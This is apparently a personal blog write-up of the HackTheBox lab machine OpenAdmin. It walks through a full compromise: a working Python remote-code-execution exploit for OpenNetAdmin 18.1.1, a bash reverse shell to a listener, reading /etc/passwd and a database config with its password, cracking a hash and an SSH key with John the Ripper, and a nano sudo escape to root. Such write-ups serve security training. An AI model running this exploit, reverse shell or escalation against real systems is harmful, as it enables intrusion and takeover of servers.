HackTheBox – OpenAdmin Write-up

Hi everyone!

Today’s post is on OpenAdmin, an easy GNU/Linux machine on HackTheBox. However, many people and I feel that it is more a medium rating machine. OpenAdmin was launched on 5th January 2020. This machine focuses on OpenNetAdmin 18.1.1 CVE to gain access to the server, bad password habit for user account pivoting, file enumeration for 3rd user account, cracking SSH’s encrypted private key for a password, and nano GTFObin for privilege escalation. Read on if you are interested. Let’s get started!

Fig 1. OpenAdmin machine on HackTheBox

Tools required

Nmap analysis

As usual, we first start with enumerating all the available services/ports in the machine using Nmap.

┌──(soulx㉿kali)-[~]
└─$ IP=10.10.10.171             
                                                                                                                                                                                                                                             
┌──(soulx㉿kali)-[~]
└─$ nmap -A -p1-9999 -v $IP        
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 23:25 +08
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:25
Completed NSE at 23:25, 0.00s elapsed
Initiating NSE at 23:25
Completed NSE at 23:25, 0.00s elapsed
Initiating NSE at 23:25
Completed NSE at 23:25, 0.00s elapsed
Initiating Ping Scan at 23:25
Scanning 10.10.10.171 [2 ports]
Completed Ping Scan at 23:25, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:25
Completed Parallel DNS resolution of 1 host. at 23:25, 0.20s elapsed
Initiating Connect Scan at 23:25
Scanning 10.10.10.171 [9999 ports]
Discovered open port 80/tcp on 10.10.10.171
Discovered open port 22/tcp on 10.10.10.171
Increasing send delay for 10.10.10.171 from 0 to 5 due to max_successful_tryno increase to 4
Connect Scan Timing: About 18.20% done; ETC: 23:28 (0:02:19 remaining)
Connect Scan Timing: About 33.30% done; ETC: 23:28 (0:02:02 remaining)
Connect Scan Timing: About 46.93% done; ETC: 23:28 (0:01:43 remaining)
Connect Scan Timing: About 62.99% done; ETC: 23:28 (0:01:11 remaining)
Connect Scan Timing: About 77.55% done; ETC: 23:28 (0:00:44 remaining)
Completed Connect Scan at 23:28, 199.08s elapsed (9999 total ports)
Initiating Service scan at 23:28
Scanning 2 services on 10.10.10.171
Completed Service scan at 23:28, 6.31s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.171.
Initiating NSE at 23:28
Completed NSE at 23:28, 4.36s elapsed
Initiating NSE at 23:28
Completed NSE at 23:28, 0.59s elapsed
Initiating NSE at 23:28
Completed NSE at 23:28, 0.00s elapsed
Nmap scan report for 10.10.10.171
Host is up (0.14s latency).
Not shown: 9997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 23:28
Completed NSE at 23:28, 0.00s elapsed
Initiating NSE at 23:28
Completed NSE at 23:28, 0.00s elapsed
Initiating NSE at 23:28
Completed NSE at 23:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.24 seconds

We can see that SSH is available on port 22 and there is a website at port 80. Let’s go to the website and take a look.

Outlook of the website

The website shown to us is just an Apache document.

Fig 4a. Main page of http://10.10.10.171

I tried to look at robots.txt on the website but it does not exist. Therefore, I have to do some directory fuzzing with Dirbuster.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ dirbuster http://$IP -l /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e pl,php,html,jsp,sh,txt                        
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /music/ - 200
Dir found: /icons/ - 403
File found: /music/index.html - 200
File found: /ona - 301
File found: /music/category.html - 200
File found: /music/playlist.html - 200
File found: /music/artist.html - 200
File found: /music/blog.html - 200
File found: /music/contact.html - 200
Dir found: /music/img/ - 200
Dir found: /music/img/icons/ - 200
Dir found: /ona/ - 200
Dir found: /music/img/concept/ - 200
Dir found: /music/img/premium/ - 200
Dir found: /music/js/ - 200
Dir found: /music/img/playlist/ - 200
......
File found: /index.html - 200
File found: /ona/index.php - 200

There are a lot of results but I chose to show only those that are interesting. We can see that there are /music/ folder, /icons/ folder, /ona/ folder, etc.

If we look at the music folder, some of the buttons/pages are working while some will just redirect to the same page.

I browsed around and nothing was interesting. I decided to look at /ona/ folder.

We can see on the top left yellow box that the current OpenNetAdmin (ona) is not the latest version. A quick google and we can see that version 18.1.1 is subjectable to ping injection and thus result in Remote Code Execution (RCE). You can read more about the technical part such as why the ws_ping() contains a vulnerability which the research was done by Nairuz Abulhul here.

Accessing web server via OpenNetAdmin v18.1.1 vulnerability

Just a quick GitHub search, I can found a working exploit by Amriunix: https://github.com/amriunix/ona-rce

#!/usr/bin/python3

'''
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2020-01-18
# Exploit Author: @amriunix (https://amriunix.com)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
'''

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def helper(filename):
    print("\n[-] Usage: python3 " + filename + " [check | exploit] <URL>")
    print("\n[*] Options:")
    print("\t[+] check    : Verify if the target is vulnerable")
    print("\t[+] exploit  : Exploiting the target\n")
    exit(1)
def check(target):
    try:
        req = requests.get(url = target, verify = False)
    except:
        print("[-] Warning: Error while connecting o the remote target")
        exit(1)
    return('v18.1.1' in req.text)

def exploit(target, cmd):
    payload = {
        'xajax':'window_submit',
        'xajaxr':'1574117726710',
        'xajaxargs[]':['tooltips','ip=>;echo \"BEGIN\";{} 2>&1;echo \"END\"'.format(cmd),'ping']
    }
    try:
        req = requests.post(url = target, data = payload, verify = False)
    except:
        print("[-] Warning: Error while connecting o the remote target")
        exit(1)
    data = req.text
    result = data[data.find('BEGIN')+6:data.find('END')-1]
    return(result)

if __name__ == '__main__':
    print('[*] OpenNetAdmin 18.1.1 - Remote Code Execution')
    filename = sys.argv[0]
    if len(sys.argv) != 3:
        helper(filename)
    else:
        print("[+] Connecting !")
        opt =  sys.argv[1].lower()
        target = sys.argv[2] + '/'
        if opt == 'check':
            if (check(target)):
                print("[+] The remote host is vulnerable!")
            else:
                print("[-] The remote host is NOT vulnerable!")
        elif opt == 'exploit':
            if (check(target)):
                print("[+] Connected Successfully!")
            else:
                print("[-] Warning: Error while connecting o the remote target")
            cmd = ''
            while(True):
                cmd = input('sh$ ').lower()
                if (cmd == 'exit'):
                    exit(0)
                print(exploit(target, cmd))
        else:
            print("[-] Warning: Command not found !")

As it is just Remote Code Execution (RCE), it is not a proper shell. It is good to get a shell as let’s say in HackTheBox’s battleground or actual hacking scenario, if the system gets patched, we won’t have access to it anymore. So having instance(s) of the shell allows us to still have access to the system. Therefore, I will be sending a reverse bash shell and having a Netcat listen to a port for an incoming connection from the webserver.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ nc -lvnp 1337          
listening on [any] 1337 ...

Once our Netcat is set up, we can run the exploit script and send a reverse bash command to the webserver.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ python3 ./ona_exploit.py exploit http://$IP
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
sh$ /bin/bash -c 'bash -i >& /dev/tcp/10.10.1.1/1337 0>&1'

Our Netcat should receive an incoming connection from the website server and a reverse shell is obtained.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ nc -lvnp 1337          
listening on [any] 1337 ...
connect to [10.10.1.1] from (UNKNOWN) [10.10.10.171] 53846
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$

If we try to access the /home directory, there isn’t one for the account we are in.

www-data@openadmin:/opt/ona/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@openadmin:/opt/ona/www$ cd $HOME
cd $HOME
bash: cd: HOME not set

Therefore, we need to find what other user account(s) we can pivot to that may have the user flag.

Pivot to another user account and get user flag

Obtaining lists of users

We can first obtain a list of users via the file /etc/passwd.

www-data@openadmin:/opt/ona/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

We are interested in jimmy and joanna’s accounts as they have the $HOME directory which might have the user flag.

Pivoting to Jimmy’s account via bad password

The first thing that came to my mind is the MySQL database in the server. As the /ona/ folder has a login page at http://10.10.10.171/ona/login.php, there should be a database to verify the login credentials.

Fig 6a. OpenNetAdmin login page at http://10.10.10.171/ona/login.php

Just a quick google, I found out that it is located at ona/www/local/config/database_settings.inc.php. Therefore, we can search for it and print its content.

www-data@openadmin:/opt/ona/www$ ls
ls
config
config_dnld.php
dcm.php
images
include
index.php
local
login.php
logout.php
modules
plugins
winc
workspace_plugins
www-data@openadmin:/opt/ona/www$ cd local/config
cd local/config
www-data@openadmin:/opt/ona/www/local/config$ ls
ls
database_settings.inc.php
motd.txt.example
run_installer
www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>

I tried to use it to access the MySQL database in the localhost, dump the User table, and crack the MD5 hashes. However, the credentials inside are useless. It only contains:

Username:Password
guest:test
admin:admin

Therefore, I decided to try to use MySQL’s database’s password to login into Jimmy’s and Joanna’s accounts. To my surprise, it was actually Jimmy’s password. This shows an example of bad password practice as passwords are being reused.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ ssh jimmy@$IP                                                                                                                                                                                                                      jimmy@10.10.10.171's password: n1nj4W4rri0R!
jimmy@openadmin:~$

File enumeration for Joanna’s private SSH key

While searching through the files in the server, I noticed that there is a folder that only Jimmy or those in the Internal group can access. Joanna is in the Internal group as well.

immy@openadmin:~$ cd var/www
jimmy@openadmin:/var/www$ ls -al
total 16
drwxr-xr-x  4 root     root     4096 Nov 22  2019 .
drwxr-xr-x 14 root     root     4096 Nov 21  2019 ..
drwxr-xr-x  6 www-data www-data 4096 Nov 22  2019 html
drwxrwx---  2 jimmy    internal 4096 Nov 23  2019 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www
jimmy@openadmin:/var/www$ cd internal/
jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php
jimmy@openadmin:/var/www/internal$ grep 'internal' /etc/group
jimmy:x:1000 joanna:x:1001

If we look at the running services using Netstat, we can see a strange listening service at port 52846.

jimmy@openadmin:/var/www/internal$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN     
tcp        0      0 10.10.10.171:22         10.10.14.24:40398       ESTABLISHED
tcp        0    208 10.10.10.171:22         10.10.14.24:40414       ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 :::80                   :::*                    LISTEN     
udp        0      0 127.0.0.53:53           0.0.0.0:*
...

To verify if it is Joanna who is hosted the Internal website at that port, we can see the content of /etc/apache2/sites-enabled/internal.conf.

jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Since we now know that it is indeed Joanna who hosted the Internal website, we can take a look at the files’ content.

jimmy@openadmin:/var/www/internal$ cat main.php 
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$ cat index.php
...
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';
              }
            }
         ?>
      </div> <!-- /container -->

      <div class = "container">

         <form class = "form-signin" role = "form"
            action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
            ?>" method = "post">
            <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
            <input type = "text" class = "form-control"
               name = "username"
               required autofocus></br>
            <input type = "password" class = "form-control"
               name = "password" required>
            <button class = "btn btn-lg btn-primary btn-block" type = "submit"
               name = "login">Login</button>
         </form>
...

We can see that index.php is a login page where username and password will be verified before going into main.php where the private SSH RSA of Joanna will be printed on the website. Based on index.php, we can see that the username is “jimmy” while the password is a SHA512 hash. We can use crackstation.net, an online cracker to crack it for us.

Fig 6b. Cracked SHA512 hash of Internal website’s password

Since we now know the password is Revealed, we can login to the website using cURL.

jimmy@openadmin:/var/www/internal$ curl -d "username=jimmy&password=Revealed" -X POST http://localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Cracking Joanna’s SSH RSA private key

We can first copy Joanna’s SSH RSA private key into a file called joanna_rsa before we locate ssh2john (installed with John The Ripper) to use it on the key before using John The Ripper to obtain the password for SSH. You can refer to this website on how to use it if you want.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ locate *ssh2john*                                                                                                                                                                                                                  /usr/share/john/ssh2john.py

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ /usr/share/john/ssh2john.py ./joanna_rsa > joanna_rsa.john

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ john -wordlist=/usr/share/wordlists/rockyou.txt ./joanna_rsa.john                                                                                                                                                                    Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (./joanna_rsa)
1g 0:00:00:09 DONE (2021-07-16 21:12) 0.1040g/s 1492Kp/s 1492Kc/s 1492KC/sa6_123..*7¡Vamos!
Session completed

Now we know the password is bloodninjas, we can use the SSH RSA private key and the password to login. Before using the SSH RSA private key, we need to change the permission to read-only for the owner before it is usable using chmod 400.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ chmod 400 joanna_rsa

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ ssh -i joanna_rsa joanna@$IP
Enter passphrase for key 'joanna_rsa': bloodninjas
joanna@openadmin:~$ 

Obtaining the user flag

joanna@openadmin:~$ ls
user.txt
joanna@openadmin:~$ cat user.txt 
c9b*****************************

Obtaining root flag

As always, we will first use sudo -l command to see if there are any root privilege commands or tools the user can use.

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Nano GTFObin privilege escalation

As Joanna can use nano for the specific /opt/priv file, we can look for nano in GTFObin on how to escalate privileges with it. You can see the usage here.

joanna@openadmin:~$ sudo /bin/nano /opt/priv

/opt/priv file will be opened in Nano text editor. We can then press CTRL+R then followed by CTRL+X. This will give us a prompt Command to execute:. We can then input the following commands to get the root shell.

Command to execute:  
Command to execute: reset; sh 1>&0 2>&0
Command to execute: reset; sh 1>&0 2>&0# 

We can try to run some commands to test it.

Command to execute: reset; sh 1>&0 2>&0# id                                                                                                                                                                                                  
uid=0(root) gid=0(root) groups=0(root)
# 

Obtaining root flag

# ls /root                                                                                                            M-F New Buffer
root.txt
# cat /root/root.txt
2f9***************************
#

I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.